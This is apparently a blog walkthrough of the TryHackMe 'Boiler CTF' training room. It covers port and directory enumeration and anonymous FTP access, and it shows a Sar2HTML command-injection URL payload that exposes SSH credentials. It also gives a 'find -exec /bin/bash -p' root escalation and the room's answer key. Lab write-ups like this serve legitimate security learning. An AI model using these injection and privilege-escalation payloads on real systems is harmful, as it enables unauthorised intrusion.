Tryhackme - Boiler CTF

Tryhackme – Boiler CTF

In this walk through, we will be going through the Boiler CTF room from Tryhackme. It is a medium rated box on the platforms and demands skills in enumeration, finding public exploits and how to leverage the basics privilege escalation vectors. Beware of the trolls and rabbit hole the box gives you. On that basis, let’s get started.

Boiler CTF

Machine Info:

TitleBoilCTF
IPaddress10.10.217.53
DifficultyMedium
ObjectiveIntermediate level CTF. Just enumerate, you’ll get there.

Phase 1 – Enumeration

  • First checking if machine is live or not.

pinging machine to check if live or not

  • Started with a regular nmap scan along with a full port scan to discover unusual ports. Found – 21 (FTP), 22 (SSH), 10000 (Webmin) and 55007 (another SSH)

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.217.53
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-05-13 22:16 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57872 > 10.10.217.53:53 S ttl=37 id=21610 iplen=44  seq=2684070567 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57873 > 10.10.217.53:53 S ttl=58 id=53905 iplen=44  seq=2684005030 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57874 > 10.10.217.53:53 S ttl=53 id=18665 iplen=44  seq=2683939493 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.217.53, 16) => Operation not permitted
Offending packet: TCP 10.18.11.103:57875 > 10.10.217.53:53 S ttl=57 id=63427 iplen=44  seq=2683873956 win=1024 <mss 1460>
Nmap scan report for 10.10.217.53
Host is up (0.22s latency).
Not shown: 996 closed ports
PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3
53/tcp    filtered domain
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
10000/tcp open     http    MiniServ 1.930 (Webmin httpd)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.13 seconds

nmap scan

nmap scan on port 55007
  • Found a hidden txt file in FTP server which we accessed through anonymous login.

wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ ftp 10.10.217.53
Connected to 10.10.217.53.
220 (vsFTPd 3.0.3)
Name (10.10.217.53:wh1terose): anonymous

230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21  2019 .info.txt
226 Directory send OK.
ftp> get .info.txt
local: .info.txt remote: .info.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.00 secs (115.2562 kB/s)
ftp> exit
ca221 Goodbye.
wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ cat .info.txt 
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
wh1terose@fsociety:~/CTF/TryHackme/Boiler CTF$ 

ftp anonymous login

  • Lots of trolls on the machine.

cyberchef decode result in a troll

  • Webmin exploit failed.

webmin exploit failed
  • Fired up gobuster on webserver at port 80, found a joomla installation.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.217.53/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.217.53/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/05/13 22:20:10 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 291]
/.htpasswd            (Status: 403) [Size: 296]
/.htaccess            (Status: 403) [Size: 296]
/index.html           (Status: 200) [Size: 11321]
/joomla               (Status: 301) [Size: 313] [--> http://10.10.217.53/joomla/]
/manual               (Status: 301) [Size: 313] [--> http://10.10.217.53/manual/]
/robots.txt           (Status: 200) [Size: 257]                                  
/server-status        (Status: 403) [Size: 300]                                  
                                                              

gobuster scan

  • Lots of rabbit hole.
robots.txt

  • Firing up gobuster on joomla endpoint. Found potential directories like – _test

wh1terose@fsociety:~$ gobuster dir -u http://10.10.217.53/joomla/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.217.53/joomla/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/05/13 22:25:36 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 298]
/.htaccess            (Status: 403) [Size: 303]
/.htpasswd            (Status: 403) [Size: 303]
/_archive             (Status: 301) [Size: 322] [--> http://10.10.217.53/joomla/_archive/]
/_database            (Status: 301) [Size: 323] [--> http://10.10.217.53/joomla/_database/]
/_files               (Status: 301) [Size: 320] [--> http://10.10.217.53/joomla/_files/]   
Progress: 380 / 4656 (8.16%)                                                      Progress: 400 / 4656 (8.59%)                                                      /_test                (Status: 301) [Size: 319] [--> http://10.10.217.53/joomla/_test/]    

gobuster scan on joomla endpoint

http://10.10.217.53/joomla/_test/index.php

sar2html page

  • Found an RCE in Sar2HTML which we can be exploit using command execution.

Sar2HTML RCE

view log

  • Viewing the log file using the payload.

http://10.10.217.53/joomla/_test/index.php?plot=;cat log.txt
viewing the log file

  • Found a SSH log entry showcasing an SSH login attempt. We got the user credentials.
Creds Found:

Username: basterd
Password: superduperp@$$

Phase 2 – Exploitation

  • Got our first entry via SSH on unusual SSH port – 55007 with the credentials of user “basterd”
SSH into the server

$ cat backup.sh
REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log
 
DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
	     echo "Begining copy of" $i  >> $LOG
	     scp  $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
	     echo $i "completed" >> $LOG
		
		if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
		    rm $SOURCE/$i
		    echo $i "removed" >> $LOG
		    echo "####################" >> $LOG
				else
					echo "Copy not complete" >> $LOG
					exit 0
		fi 
    done
     

else

    echo "Directory is not present" >> $LOG
    exit 0
fi
$ su stoner
Password: 
stoner@Vulnerable:/home/basterd$ cd ..
stoner@Vulnerable:/home$ cd stoner/
stoner@Vulnerable:~$ ls
stoner@Vulnerable:~$ ls -al
total 16
drwxr-x--- 3 stoner stoner 4096 Aug 22  2019 .
drwxr-xr-x 4 root   root   4096 Aug 22  2019 ..
drwxrwxr-x 2 stoner stoner 4096 Aug 22  2019 .nano
-rw-r--r-- 1 stoner stoner   34 Aug 21  2019 .secret
stoner@Vulnerable:~$ cat .secret 
You made it till here, well done.
stoner@Vulnerable:~$ 
  • Got the user “stoner” user password in backup.sh

user stone password reveals

  • Got our user flag in .secret (hidden) file.

user flag.

  • Another troll, move on with it.

sudo -l

Phase 3 – Privilege Escalation

  • Started with a normal scan with linpeas to discover potential priv esc vectors. Found the “find” binary (how funny) which we can run as root.

linpeas output

  • Used GTFObins payload to get the root shell and finally got the root flag.

stoner@Vulnerable:/$ find . -exec /bin/bash -p \;
bash-4.3# whoami
root
bash-4.3# cd /root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
It wasn't that hard, was it?

getting root on box

Task 1 – Questions #1

Question 1 – File extension after anon login

 txt

Question 2 – What is on the highest port?

SSH

Question 3 – What’s running on port 10000?

webmin

Question 4 – Can you exploit the service running on that port? (yay/nay answer)

nay

Question 5 – What’s CMS can you access?

joomla

Question 6 – Keep enumerating, you’ll know when you find it.

Done

Question 7 – The interesting file name in the folder?

log.txt

Tryhackme - Boiler CTF

Task 2 – Questions #2

Question 1 – Where was the other users pass stored(no extension, just the name)?

Done

Question 2 – user.txt

You made it till here, well done.c

Question 3 – What did you exploit to get the privileged user?

find

Question 4 – root.txt

It wasn't that hard, was it?

Tryhackme - Boiler CTF

Also Read: Tryhackme – Blue

Conclusion:

Conclusion

So, that was it. Trust me, this room “Boiler CTF” has a lot of rabbit holes and trolls lying around. You might waste some of your time and energy by going after them. However, if enumeration done properly, you can uncover the real path to the kingdom. So, let’s summarize it quickly. First, we started with a full nmap scan which gives us five ports opened – 21,22,80, 10000, 55007. Out of which, the port “55007” was unusual as it was running another SSH service. Further, we tried to exploit the webmin service on port 10000 however it got failed. Next, we used gobuster to reveal some hidden directory. Found a directory called “_test” which has a Sar2HTML functionality in it. We further exploit a RCE vulnerability in the Sar2HTML implementation and got the SSH credentials for the initial access. For privilege escalation, we exploited the “find” binary and got the root shell.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top